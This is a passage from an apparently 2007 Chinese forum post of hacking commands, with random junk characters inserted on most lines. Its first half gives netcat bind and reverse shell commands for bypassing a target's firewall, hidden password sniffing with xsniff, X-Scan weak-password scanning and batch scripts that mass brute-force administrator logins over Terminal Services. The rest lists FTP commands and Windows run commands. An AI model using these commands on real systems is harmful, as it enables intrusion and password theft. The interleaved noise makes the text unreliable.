-z 将输入,输出关掉(用于扫锚时) 6 c# v" A: K4 w: e9 J6 N
基本用法:
" X2 t2 C( ]% Q5 ^2 Q: P8 qnc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口
) D) Z8 P3 Y% r# P7 b0 W) dnc -l -p 80 开启本机的TCP 80端口并监听 / d- \. G& h( a7 _! }% b0 p
nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口
- \5 {! u8 G% c9 ?nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口 4 x. U8 Z& O# w7 ~# r$ X
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口
: X- M; d* t9 [4 b7 i高级用法: 1 w# n: j, ~1 ]+ W! G5 B
nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止
6 @; W6 S2 B: Gnc -L -p 80 > c:\log.*t 作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:\log.*t ' a2 J' T. b7 B" _ U' N$ \
nc -L -p 80 < c:\honeyport.*t 作为蜜罐用3-1:开启并不停地监听80端口,直到CTR+C,并把c:\honeyport.*t中内容送入管道中,亦可起到传送文件作用
( @! D8 j; K% V# utype.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTR+C,并把c:\honeyport.*t中内容送入管道中,亦可起到传送文件作用
6 _ ]4 G1 S& o5 R4 b v, v本机上用:nc -l -p 本机端口
; e- V+ n: \, m: m在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K
9 v# J, x8 z1 A) J) ync -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙 9 @; v6 a; r4 M P/ d1 X& I5 z+ I: n
本机上用:nc -d -l -p 本机端口 < 要传送的文件路径及名称 9 [6 n3 j, z2 k/ Q k6 o
在对方主机上用:nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机 5 z- ~8 L. ~: J! t
备 注: ' z5 h% q. B: J% |0 v% c6 E( r
| 管道命令 % y/ M9 |( j. I% o; r, m3 s
< 或 > 重定向命令。“<”,例如:tlntadmn < test.*t 指把test.*t的内容赋值给tlntadmn命令 : H& e2 C* O& r- E
@ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:\winnt >> d:\log.*t 意思是:后台执行dir,并把结果存在d:\log.*t中
' }) x/ b, x- I' c9 G>与>>的区别 ">"指:覆盖;">>"指:保存到(添加到)。0 l2 G9 n6 X4 q" Q- R, e* n* p
如:@dir c:\winnt >> d:\log.*t和@dir c:\winnt > d:\log.*t二个命令分别执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。& k; E6 U& m3 ]
4 T0 f3 |+ p7 m$ K5 Q, t#8 八:
, D; |1 J7 ^# _! `. G3 c& A. b
, a' Z! W# L C: G6 ^4 D, d5 G* v2、扫锚工具:xscan.exe* Y8 k9 E9 K6 x" _+ a3 W* E
L9 n' p7 r6 r# a) u0 s `) Q, y
基本格式 ! u5 p$ Q( t% ^! H/ L
xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息
0 U2 A% X4 C4 J- oxscan -file <主机列表文件名> <检测项目> [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息
6 s9 V5 e, U2 Z, a; d检测项目 ) v n( T# D% }3 a0 i
-active 检测主机是否存活
6 I% M: B& T0 @-os 检测远程操作系统类型(通过NETBIOS和SNMP协议)
3 o( c. L" X$ h; h# {" R-port 检测常用服务的端口状态 6 u4 @' c+ u( ~5 g$ z" t
-ftp 检测FTP弱口令 T& _# {, W% B% L8 [4 [. w9 u
-pub 检测FTP服务匿名用户写权限
/ c7 A. U, w. z/ `6 g-pop3 检测POP3-Server弱口令
9 ]' {9 E! ]$ R) _2 k-smtp 检测SMTP-Server漏洞 ) ]6 j. Z* r; D* L
-sql 检测SQL-Server弱口令 * n) S, C0 x1 X% |& z2 c8 ?
-smb 检测NT-Server弱口令 * f1 ]) L4 Z7 _* Z% O k
-iis 检测IIS编码/解码漏洞
- F8 p2 d& T9 z9 {-cgi 检测CGI漏洞
2 L" M- Z) F# h-nasl 加载Nessus攻击脚本 . {: F/ d: b% A* q& J0 U
-all 检测以上所有项目 8 r$ Y/ m$ y$ y
其它选项 ) K! r: R( ~, v- k( u, c
-i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取 # z% E6 p) y* v3 T+ m
-l 显示所有网络适配器
; ]* U# _( x5 H* ?! h" z# `. e" F) ?-v 显示详细扫描进度 2 @' R% L1 M# R) u2 o5 m
-p 跳过没有响应的主机 1 ]6 z" J8 O) N( @. F( f
-o 跳过没有检测到开放端口的主机
+ M& Y) U+ O; g4 w -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10 6 `% m* d; e, ^! L- Z1 ~, Q
-log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件)
4 W E3 K0 n- `! a用法示例
* u; W% ?2 |2 ?- Gxscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机
9 w3 _* A1 z1 A" ?7 F% Yxscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机 0 m5 p8 ]; y2 z* O! u
xscan -file hostlist.*t -port -cgi -t 200,5 -v -o 检测“hostlist.*t”文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机http://www.jz5u.com/; t o) s$ p+ C; N
/ K* @+ t3 Q. T2 M& d7 z#9 九:, \- x0 K5 M2 T6 [+ Y! ?
% S5 k9 l3 Z* e! u2 w3、命令行方式嗅探器: xsniff.exe% g4 p4 \/ m4 k
可捕获局域网内FTP/SMTP/POP3/HTTP协议密码" l# ~, I Q8 u" f! ?, k# E- H
参数说明
9 S; N/ [* F6 G% x8 Q/ T) S/ U-tcp 输出TCP数据报
* v0 Y' I# U, h" `6 x) s' ^-udp 输出UDP数据报 ( ?7 M7 V/ r1 b" j5 |( J* b1 E( S
-icmp 输出ICMP数据报
" Q0 t! T B, ~-pass 过滤密码信息
2 h1 R' p6 v- Z5 {* M5 d6 I5 t( P-hide 后台运行 " S9 Y, p0 d; s
-host 解析主机名 : c% |* I1 C" J6 r
-addr IP地址 过滤IP地址
4 P/ Y! T% k3 [# Y-port 端口 过滤端口 , ?; H' p' H7 k1 N% Q, p" W; V
-log 文件名 将输出保存到文件
7 w2 c- D# i' M& w. R-asc 以ASCII形式输出 4 o1 T' I& A* w$ l3 I0 E
-hex 以16进制形式输出 6 Q1 c* J" _* I3 V$ R. J& s8 [
用法示例 4 R2 z; Y$ M" J3 J O2 N
xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中 ( _$ R* n0 V6 r3 T9 v$ S
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出 0 n5 Y, }. |8 G8 ^
/ H% a& y9 E! [2 q' G7 ]/ y* @0 A1 r4、终端服务密码破解: tscrack.exe
. d. X0 }# m$ V* h/ u. U9 h" J& e) i- p+ q0 z$ t4 J0 {" k
参数说明 7 ]. B8 ` V+ u; }# a
-h 显示使用帮助
3 f% W' G7 B) @+ j. Y$ l: K-v 显示版本信息 . V/ s, N- K: ~, x& E% V
-s 在屏幕上打出解密能力 & p2 [0 u/ N9 Z, G( I2 J& b$ b' m
-b 密码错误时发出的声音 6 e* k4 Q( F6 X4 M: s& G/ \ J
-t 同是发出多个连接(多线程)
6 W. X6 K* X ]: b: C-N Prevent System Log entries on targeted server
& k$ J1 |9 G0 a6 ]7 K5 b' c8 K3 i-U 卸载移除tscrack组件 # \2 q" Y- w/ j2 O/ [# X2 [% E
-f 使用-f后面的密码
* W6 @. c& e: B) G; s2 Z I-F 间隔时间(频率)
1 X2 l" B( W5 E) N; j4 `" E8 H. f-l 使用-l后面的用户名 4 o5 z" M8 `4 m- x
-w 使用-w后面的密码字典
( N5 j% w9 G( z$ V6 V6 b-p 使用-p后面的密码 8 X; o7 f ^5 U" R6 U! w9 }
-D 登录主页面 : A7 B3 i& E- v- f: O0 ?+ O' m
用法示例 ' m' A) U4 E: v4 u4 Y" k0 c
tscrack 192.168.0.1 -l ***istrator -w pass.dic 远程用密码字典文件暴破主机的***istrator的登陆密码
/ a4 v( k2 s( u) s- Ftscrack 192.168.0.1 -l ***istrator -p 123456 用密码123456远程登陆192.168.0.1的***istrator用户 0 a0 c" {/ s4 P
@if not exist ipcscan.*t goto noscan
6 K& h' {5 c- R! w0 m" g@for /f "tokens=1 delims= " %%i in (3389.*t) do call hack.bat %%i % E6 Y" f' ], D' a5 t, N
nscan
+ h5 r$ A9 }8 u5 u5 H@echo 3389.*t no find or scan faild * t8 x! y0 M' O l, |/ n
(①存为3389.bat) (假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.*t) + Q+ ?' J/ o9 z" j6 B1 K
3389.bat意思是:从3389.*t文件中取一个IP,接着运行hack.bat " S9 v' a7 s+ S
@if not exist tscrack.exe goto noscan
0 Z) Y }7 o3 r4 ~@tscrack %1 -l ***istrator -w pass.dic >>rouji.*t ' `/ Z2 J0 R$ v% g R3 ~
:noscan
9 g/ l2 ^: s4 k( s, w3 w@echo tscrack.exe no find or scan faild ' T$ j1 ]: D: g) P
(②存为hack.bat) (运行3389.bat就OK,且3389.bat、hack.bat、3389.*t、pass.dic与tscrack.exe在同一个目录下;就可以等待结果了)
# U# t% T9 ^5 G. V/ L" r8 n" K+ uhack.bat意思是:运行tscrack.exe用字典暴破3389.*t中所有主机的***istrator密码,并将破解结果保存在rouji.*t文件中。
. f/ K# G9 r: r+ A' B A7 v! `5 J
5、其它:
) |0 B; v3 g3 I. b% [: A0 Z, |3 `
Shutdown.exe
! X2 t$ m( H& T8 l/ K/ S+ f$ f* ^Shutdown \\IP地址 t:20 20秒后将对方NT自动关闭(Windows 2003系统自带工具,在Windows2000下用进就得下载此工具才能用。在前面Windows 2003 DOS命令中有详细介绍。) 8 o! @* x+ S$ J- d: y3 ^2 u
fpipe.exe (TCP端口重定向工具) 在第二篇中有详细说明(端口重定向绕过防火墙)
! t0 l7 Z- J# rfpipe -l 80 -s 1029 -r 80 http://www.sina.com.cn/ 当有人扫锚你的80端口时,他扫到的结果会完全是http://www.sina.com.cn/的主机信息 . I) A! H2 T5 e" b. r
Fpipe -l 23 -s 88 -r 23 目标IP 把本机向目标IP发送的23端口Telnet请求经端口重定向后,就通过88端口发送到目标IP的23端口。(与目标IP建立Telnet时本机就用的88端口与其相连接)然后:直接Telnet 127.0.0.1(本机IP)就连接到目标IP的23端口了。
' R2 |" e2 g% n# XOpenTelnet.exe (远程开启telnet工具) ?% c0 C- p; S/ c7 |- w) C
opentelnet.exe \\IP 帐号 密码 ntlm认证方式 Telnet端口 (不需要上传ntlm.exe破坏微软的身份验证方式)直接远程开启对方的telnet服务后,就可用telnet \\ip 连接上对方。) {- | o) a* r8 |, P! i
NTLM认证方式:0:不使用NTLM身份验证;1:先尝试NTLM身份验证,如果失败,再使用用户名和密码;2:只使用NTLM身份验证。
' F0 ~ x8 b- A+ l* Q8 n5 N' ^) ?' [; J+ q: n" {
ResumeTelnet.exe (OpenTelnet附带的另一个工具) % ]4 R8 I2 }; }0 |
resumetelnet.exe \\IP 帐号 密码 用Telnet连接完对方后,就用这个命令将对方的Telnet设置还原,并同时关闭Telnet服务。: T) k1 {- \+ w1 y! o& m
0 u1 S; G% I' w7 g) I8 U; P7 ~
#10 十:1 V- Q3 F' Z( t
8 X- F. F7 y6 x' R# X' U0 h1 D. a
6、FTP命令详解:
/ l5 N6 o" B9 d9 X( f3 H ]! C5 X; X+ Q, L/ O0 \
FTP命令是Internet用户使用最频繁的命令之一,熟悉并灵活应用FTP的内部命令,可以大大方便使用者,并收到事半功倍之效。如果你想学习使用进行后台FTP下载,那么就必须学习FTP指令。 c0 O& |( H) N
4 U; a& h+ h3 p" z
FTP的命令行格式为: F/ e! z* H/ M7 ^3 e6 U1 a
ftp -v -d -i -n -g [主机名] ,其中6 S: f% l3 F5 f! m
, N) m: P I/ R& {/ v w& _
-v 显示远程服务器的所有响应信息;) H7 F! y+ \* j! n, @
& C% y4 h& Y2 B: ~; ]
-n 限制ftp的自动登录,即不使用;.n etrc文件;
& m$ k: P8 O6 E' b" n* `' Y7 R8 y F8 B6 g$ u* L/ B
-d 使用调试方式;
" E! v; M; D- P7 _! c% |
1 F4 F; ~9 X& r" L-g 取消全局文件名。+ p0 L- J0 m8 l2 U& q3 ^
5 L9 Q0 R1 V$ {& B# n5 m
FTP使用的内部命令如下(中括号表示可选项):, W% H: ?4 u8 _6 T5 s
# U, Q0 z+ s v3 D1 s5 @$ H
1.![cmd[args]]:在本地机中执行交互shell,exit回到ftp环境,如:!ls*.zip 3 m$ }+ i9 w/ e! P/ d
2.$ macro-ame[args]: 执行宏定义macro-name。/ _7 ]& }9 z0 V$ U
0 b7 x5 B* E* f: K7 Q. M* x v
3.account[password]: 提供登录远程系统成功后访问系统资源所需的补充口令。 - Q5 s" n) J2 o; P' Y
4.append local-file[remote-file]:将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。0 R$ d6 ` [! j0 h8 d
4 p. F, f9 K, F0 I5 l$ F' z5 x' g
5.ascii:使用ascii类型传输方式。
- h! E" ?: z2 U* \: f+ _6.bell:每个命令执行完毕后计算机响铃一次。* {. A8 i7 f2 |% G: z0 N
0 T3 H9 m; g" ]$ y2 S) Q
7.bin:使用黑客动画吧文件传输方式。
4 D7 A: U+ d5 j% G) E& {9 U8.bye:退出ftp会话过程。7 ]0 x% x: q) d- R n G
! o4 {! i, y' k' S/ C9.case:在使用mget时,将远程主机文件名中的大写转为小写字母。 * D9 m8 V9 s# _$ K& k# M
10.cd remote-dir:进入远程主机目录。; j! D$ B' ?8 O" X u% A
5 R* f' i- v/ x% l0 z11.cdup:进入远程主机目录的父目录。
8 `0 Q! f6 l) S: h12.chmod mode file-name:将远程主机文件file-name的存取方式设置为mode,如:chmod 777 a.out。* A8 S# L6 A; y) X
1 b( h$ w. V8 i2 _, X3 p13.close:中断与远程服务器的ftp会话(与open对应)。 2 M& h9 E! O( w1 n7 Z
14.cr:使用asscii方式传输文件时,将回车换行转换为回行。. k% R: S$ H: O4 T5 G
/ A ?$ c D4 R: P$ Q15.delete remote-file:删除远程主机文件。
4 k4 [9 _) R2 ?( n; n16.debug[debug-value]:设置调试方式, 显示发送至远程主机的每条命令,如:deb up 3,若设为0,表示取消debug。) B0 ^0 E/ Q/ y1 {
$ i* A, S& Q' j# `( ~' c) R: E
17.dir[remote-dir][local-file]:显示远程主机目录,并将结果存入本地文件。
! p2 d+ h: \' P3 D G18.disconnection:同close。
5 e! N" x- e% M% n) Z- k7 o+ o4 }: K1 y/ ^
19.form format:将文件传输方式设置为format,缺省为file方式。 " G# N% `; u: [, u8 U
20.get remote-file[local-file]: 将远程主机的文件remote-file传至本地硬盘的local-file。
# d( `' u% h9 [
1 [* \. h6 w5 B7 G/ B0 R21.glob:设置mdelete,mget,mput的文件名扩展,缺省时不扩展文件名,同命令行的-g参数。
+ z& c# g5 ~: y1 d( K$ i; I9 [22.hash:每传输1024字节,显示一个hash符号(#)。
) E% P: A7 X& v) U( p
6 ]4 K5 T* B$ E) M23.help[cmd]:显示ftp内部命令cmd的帮助信息,如:help get。 9 g2 S! _& ^9 p: {& k6 t. E
24.idle[seconds]:将远程服务器的休眠计时器设为[seconds]秒。
5 @; i- J3 X+ t# l* X; b/ v+ Y
6 o+ S3 ^9 Y& v% y) o5 b# v% E- c25.image:设置黑客动画吧传输方式(同binary)。 ! h; x* m: l' o6 P/ P
26.lcd[dir]:将本地工作目录切换至dir。
+ E( R+ L: x3 X& F1 W Q5 _. c4 b6 [8 }
27.ls[remote-dir][local-file]:显示远程目录remote-dir, 并存入本地文件local-file。 * N- }0 c' F2 y
28.macdef macro-name:定义一个宏,遇到macdef下的空行时,宏定义结束。
' ~8 U+ o. \/ [" u5 G# C" o( P2 j# e8 M: W# r' @8 |: I
29.mdelete[remote-file]:删除远程主机文件。 5 J( C* S/ x% w6 o. b5 W+ {
30.mdir remote-files local-file:与dir类似,但可指定多个远程文件,如 :mdir *.o.*.zipoutfile 。8 h* O5 {3 @3 T
* _" u+ B2 e' R/ W2 B31.mget remote-files:传输多个远程文件。 : \: y+ O( T& j6 ^/ e7 v% t
32.mkdir dir-name:在远程主机中建一目录。
& O5 |/ F" P- ?
/ m# { _. u/ r2 x33.mls remote-file local-file:同nlist,但可指定多个文件名。 + \2 l1 C- d3 N4 q
34.mode[modename]:将文件传输方式设置为modename, 缺省为stream方式。
6 n3 }. b5 v' i* U" C8 g
' K. l e1 i, o# G( ^! G! Y7 [35.modtime file-name:显示远程主机文件的最后修改时间。
( ` d, L4 a& Y3 f! A6 P' ]36.mput local-file:将多个文件传输至远程主机。
0 |6 i) K0 x0 a# V e4 x. V3 t" e, V% C7 Z2 `" X
37.newer file-name: 如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近,则重传该文件。; b6 H: ^0 x+ e" ?) {. d
38.nlist[remote-dir][local-file]:显示远程主机目录的文件清单,并存入本地硬盘的local-file。
+ j8 q9 F+ u* a. k* R: v! t* u1 F
' b, [" `( w9 q39.nmap[inpattern outpattern]:设置文件名映射机制, 使得文件传输时,文件中的某些字符相互转换, 如:nmap $1.$2.$3[$1,$2].[$2,$3],则传输文件a1.a2.a3时,文件名变为a1,a2。 该命令特别适用于远程主机为非UNIX机的情况。- c4 N7 _$ o w
40.ntrans[inchars[outchars]]:设置文件名字符的翻译机制,如ntrans1R,则文件名LLL将变为RRR。
# b8 p% U# K- r u: g9 c3 C: f6 U1 x! d/ A: P
41.open host[port]:建立指定ftp服务器连接,可指定连接端口。
7 ]4 n! K5 a3 f2 Q0 p$ n42.passive:进入被动传输方式。
4 n- e V0 D" ^$ `5 k! j, g
9 Y2 p5 a5 @* Z) ^* `5 p* S6 e43.prompt:设置多个文件传输时的交互提示。
0 G, _; k) \7 L3 V( D% q4 B/ Q44.proxy ftp-cmd:在次要控制连接中,执行一条ftp命令, 该命令允许连接两个ftp服务器,以在两个服务器间传输文件。第一条ftp命令必须为open,以首先建立两个服务器间的连接。
( @0 K3 b6 @' V. U+ D45.put local-file[remote-file]:将本地文件local-file传送至远程主机。 9 I& b: P" c9 c, u
46.pwd:显示远程主机的当前工作目录。% d: c3 J; O: b( A3 K, B
/ ^( {& W: K# ]4 n
47.quit:同bye,退出ftp会话。 8 F, j) s* V) C$ Z4 w! J6 i
48.quote arg1,arg2...:将参数逐字发至远程ftp服务器,如:quote syst.+ W2 ?; Z6 }( s5 ^
5 N3 R+ z! S) T+ u3 L/ i49.recv remote-file[local-file]:同get。 + A( |6 H: o1 k3 Z P1 V2 Q k" j
50.reget remote-file[local-file]:类似于get, 但若local-file存在,则从上次传输中断处续传。
% \+ B4 p" z# W" r. }: p6 n; L8 A! b8 x v+ n- ]; y
51.rhelp[cmd-name]:请求获得远程主机的帮助。 ; o/ @+ o6 |4 d
52.rstatus[file-name]:若未指定文件名,则显示远程主机的状态, 否则显示文件状态。7 t: S8 g/ s" @2 V2 C
+ H9 l# G. E$ k% f+ C! C* u
53.rename[from][to]:更改远程主机文件名。 c, M. b9 T$ n0 d% f
54.reset:清除回答队列。$ I4 s6 p ^: B) l
6 \( V) ?' C7 v' B+ s+ Q, p; e55.restart marker:从指定的标志marker处,重新开始get或put,如:restart 130。
. q* I% ^9 l& \0 j! H; ~) a56.rmdir dir-name:删除远程主机目录。' @: N" c5 N5 Q# i
* d2 d4 w5 b" \" C57.runique:设置文件名只一性存储,若文件存在,则在原文件后加后缀.1, .2等。 " D7 @& x% a# |2 \5 b; b
58.send local-file[remote-file]:同put。3 b9 ?' K' y$ I9 ]! ~
, ~% B. b- s5 h8 U. q- |. D! M59.sendport:设置PORT命令的使用。 % a3 g+ q9 E( k! X
60.site arg1,arg2...:将参数作为SITE命令逐字发送至远程ftp主机。
5 I" w. C4 v/ M- w
) |9 A" H- O' n5 ~61.size file-name:显示远程主机文件大小,如:site idle 7200。
0 z6 d0 E% @1 x, k. t! f62.status:显示当前ftp状态。http://www.jz5u.com/
$ b! n' b. L: X0 h' q4 ]8 }
* h( u3 L/ C( |* C. C! i7 O63.struct[struct-name]:将文件传输结构设置为struct-name, 缺省时使用stream结构。 6 S1 h9 p. Z* L6 E# `6 p4 G
64.sunique:将远程主机文件名存储设置为只一(与runique对应)。
0 F8 @* {: r% E* V% X* Q+ f9 Y4 W! K7 A; }8 ~
65.system:显示远程主机的操作系统类型。
& ^5 \. X2 S% v" u6 h8 I4 L+ m( T1 k- D66.tenex:将文件传输类型设置为TENEX机的所需的类型。% E) W' n$ f- j' [% Q; [, N) l: o' x
1 }3 s" F/ t5 L
67.tick:设置传输时的字节计数器。 : J' Q9 {. O. w
68.trace:设置包跟踪。6 i$ g; U0 E7 D* @8 `
* ?- O9 S2 _$ W* X* R4 W7 N6 j% P! U
69.type[type-name]:设置文件传输类型为type-name,缺省为ascii,如:type binary,设置黑客动画吧传输方式。
* X1 ~8 d8 q6 E( C6 E70.umask[newmask]:将远程服务器的缺省umask设置为newmask,如:umask 3; j' O# ?# F8 u6 Z8 K Y& m
0 _- m$ W& q6 D/ p
71.user user-name[password][account]:向远程主机表明自己的身份,需要口令时,必须输入口令,如:user anonymous my@email。
, g+ K2 G. q5 _2 n72.verbose:同命令行的-v参数,即设置详尽报告方式,ftp 服务器的所有响 应都将显示给用户,缺省为on.
+ u% j7 P5 q' k; r( t0 k4 _% z: X; u7 _3 ]0 H# a# f
73.?[cmd]:同help.
+ L g6 x/ T& A y) } g: D. o' }$ U$ r* b" y1 U
#11 十一:
- |$ w7 n! x) @+ W" P9 F7 _6 w! O) Q/ j1 s) ~* z
7:计算机运行命令全集 winver---------检查Windows版本
; l+ F1 g" v1 K; J, y$ s' Q0 z. owmimgmt.msc----打开windows管理体系结构
, l8 r! e9 O) `5 Kwupdmgr--------windows更新程序$ b4 b/ y; `2 z' |; Y
winver---------检查Windows版本7 }: } i, i% w6 w: S8 K# _
wmimgmt.msc----打开windows管理体系结构
( k; {: W) O4 bwupdmgr--------windows更新程序2 R% Z5 `5 F8 U' N
wscript--------windows脚本宿主设置# Q7 n$ }; P9 F4 W; \. a
write----------写字板winmsd-----系统信息
, u5 H6 m i# }; U4 h, Lwiaacmgr-------扫描仪和照相机向导# |% q$ }" f% D( }) Z
winchat--------XP自带局域网聊天
& c* V" B8 U u, J. z' g7 U/ }1 }mem.exe--------显示内存使用情况
" O2 r# e" _. A2 UMsconfig.exe---系统配置实用程序
# Y' ^ A' {% o$ R: p; q8 Amplayer2-------简易widnows media player
) B- D$ A! `3 ]$ Emspaint--------画图板
4 h/ S- |* K+ d4 u( u/ Emstsc----------远程桌面连接
; h! e t/ H* ~* e/ bmplayer2-------媒体播放机
2 B3 l8 l. X# r; R7 ?) Cmagnify--------放大镜实用程序
4 V/ N9 T% d7 f$ v9 n+ m: Pmmc------------打开控制台
' I7 T% U4 \- J6 s! n# smobsync--------同步命令" K, e6 y* [" [
dxdiag---------检查DirectX信息7 h2 F& }) K$ A8 A; p
drwtsn32------ 系统医生
H5 `4 n v; V d/ ?& j. ?+ ?4 j! Tdevmgmt.msc--- 设备管理器5 R( Y ?, j: k4 B- Z% f
dfrg.msc-------磁盘碎片整理程序& _# j1 z3 Y6 ^9 M- a
diskmgmt.msc---磁盘管理实用程序6 K- o3 R" a( o
dcomcnfg-------打开系统组件服务% O* r/ @( F! [0 H( O) a7 [; F' Q
ddeshare-------打开DDE共享设置5 ^" u8 k! g+ b8 Z6 U9 B2 O
dvdplay--------DVD播放器
9 L, y2 T9 {! k5 A, N& bnet stop messenger-----停止信使服务
# C( T! _ f# I( O/ a$ y7 ?7 y9 ^net start messenger----开始信使服务
. |" r) d- x# k2 ~' o1 T/ ~" Y' K' ]6 Hnotepad--------打开记事本+ {% D# W" a% G, q6 a1 r N
nslookup-------网络管理的工具向导
" G- s0 {) n, n0 E! E2 gntbackup-------系统备份和还原
9 `$ k+ W t, Xnarrator-------屏幕"讲述人"
) j% ^7 v- Y; v4 Entmsmgr.msc----移动存储管理器3 [* @+ K( O# i8 ^+ K3 F6 g
ntmsoprq.msc---移动存储管理员操作请求
$ h$ J9 y m+ r* znetstat -an----(TC)命令检查接口* b, ~4 A7 X) y( d9 T$ e$ r: u
syncapp--------创建一个公文包8 z4 h- f$ [. H+ q9 i5 s, @
sysedit--------系统配置编辑器
: {' G: x7 a) _- Z0 f* p: rsigverif-------文件签名验证程序/ p! r9 \/ k8 y: b! X- @
sndrec32-------录音机
* t1 Y9 d! b% s) oshrpubw--------创建共享文件夹" E; D& s, F- y( P% ^6 i
secpol.msc-----本地安全策略
2 O8 g* r& n( Gsyskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码! Q5 M- k3 h$ d6 e0 w5 M8 G1 M
services.msc---本地服务设置: V0 R9 U9 K- G+ }
Sndvol32-------音量控制程序+ j! _ h$ {% b& K
sfc.exe--------系统文件检查器: U5 \! @3 R! r2 h+ ]( R/ @. Q! t
sfc /scannow---windows文件保护8 z0 R$ J& {' J
tsshutdn-------60秒倒计时关机命令
: E, Q; g$ m7 }! ztourstart------xp简介(安装完成后出现的漫游xp程序)
* W2 ]8 h+ ~7 S: utaskmgr--------任务管理器3 }6 ]1 q' d0 ^) ]
eventvwr-------事件查看器
6 F+ t: s/ F3 N# E& }eudcedit-------造字程序 4 `1 [0 U1 r+ u% j% {" b5 }
explorer-------打开资源管理器6 Z% Z5 C) v# Z3 F: |! t9 l4 D
packager-------对象包装程序
% H% D; F+ c4 Q* r: P/ n& q1 Wperfmon.msc----计算机性能监测程序8 M% R- U4 B/ x
progman--------程序管理器
, k5 N' n$ ]5 hregedit.exe----注册表
a1 ]6 I% j% c) s+ Arsop.msc-------组策略结果集8 G9 }' `, r: `( h( ^7 m3 M
regedt32-------注册表编辑器
1 K S5 j. p ^: r9 E' Y4 mrononce -p ----15秒关机
( U* P8 X: y% jregsvr32 /u *.dll----停止dll文件运行/ u% [, f; l9 p8 g3 ~4 o5 \7 j8 C
regsvr32 /u zipfldr.dll------取消ZIP支持
8 w. d7 O* y4 t* w& [( A( F$ Scmd.exe--------CMD命令提示符
8 D7 x& e6 v4 z/ ^, jchkdsk.exe-----Chkdsk磁盘检查 y! m. e/ D& F, _; z& u$ q
certmgr.msc----证书管理实用程序2 h) Z0 D) L) K, I% B8 \$ P
calc-----------启动计算器, t4 [1 l$ N" s' F/ T1 E/ Z7 X
charmap--------启动字符映射表, `# z) m3 o/ R& s
cliconfg-------SQL SERVER 客户端网络实用程序3 Q: f9 q% B& E, C% ^; k' g4 g
Clipbrd--------剪贴板查看器
9 }0 a1 z6 v+ p. q5 Uconf-----------启动netmeeting
8 u$ U! F/ f5 D. X/ bcompmgmt.msc---计算机管理' Z/ _& e' y+ X: w9 z* u( g) P
cleanmgr-------**整理# q; Z! r' q9 K6 N1 }( Z6 ]
ciadv.msc------索引服务程序8 N1 ?4 Z, X2 X
osk------------打开屏幕键盘
8 j6 k/ \/ {6 e. m& ?6 j" qodbcad32-------ODBC数据源管理器
. J* g& e j5 |) ]oobe/msoobe /a----检查XP是否激活9 G) S% l6 i1 r& I% F: l) P
lusrmgr.msc----本机用户和组
, O. @! Y. `8 L/ e, Flogoff---------注销命令5 H9 e- O. z+ q4 w) B' ?, k2 y/ }
iexpress-------木马捆绑工具,系统自带7 g1 T* G2 o$ ^% S* o
Nslookup-------IP地址侦测器
' W/ j7 n3 P( J" K8 Q( o* Mfsmgmt.msc-----共享文件夹管理器
/ b0 U1 a+ H% K( _utilman--------辅助工具管理器
6 K0 U1 i& Z7 @" a5 }6 Mgpedit.msc-----组策略8 L% f: n, T9 P0 M! Y* P
/ P3 O7 m2 y6 s
[ 本帖最后由 冰泉KC 于 2007-12-7 14:04 编辑 ] |
|
狗仔卡
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡
